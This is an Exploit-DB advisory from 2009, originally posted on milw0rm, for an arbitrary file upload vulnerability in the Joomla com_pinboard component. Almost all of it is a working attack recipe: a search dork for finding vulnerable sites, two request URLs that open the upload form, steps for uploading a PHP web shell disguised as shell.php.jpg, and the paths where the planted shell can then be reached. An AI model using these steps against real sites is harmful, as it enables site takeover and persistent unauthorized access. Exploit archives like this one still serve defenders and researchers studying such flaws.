Joomla! Component com_pinboard - Arbitrary File Upload

EDB-ID:

9011

CVE:



Author:

ViRuSMaN

Type:

webapps


Platform:

PHP

Date:

2009-06-24


##############################################################
|
|                                   Joomla Component [com_pinboard] Remote File Upload Vulnerability
|
|    Author : ViRuSMaN
|
|    Contact : v-.m@live.com
|
|    Home : Islam-Attack.CoM , HackTeach.OrG
|
##############################################################
|
| Dork inurl:com_pinboard
|
| Exploite :
|
| 1-target.com/[path]/components/com_pinboard/popup/popup.php?option=showupload
|
|    or
|
| 2-target.com/[path]/index2.php?option=com_pinboard&Itemid=117&action=popup%22&action=popup&task=uploadForm
|
| [#] click on the photo in Top Of Left
|
| [#] upload your shell shell.php.jpg  &  Confirmer SVP
|
| [#] Pwd Your Shell
|  
|      target.com/[path]/images/stories/pinboard/picture/[name your shell].php.jpg
|
|      Or
|
|      target.com/[path]/strona/components/com_pinboard/pictures/[name your shell].php.jpg  
|
##############################################################
|Greets : All members of islam-attack.com , hackteach.org , s3curi7y.com & All Muslim's  
##############################################################

# milw0rm.com [2009-06-24]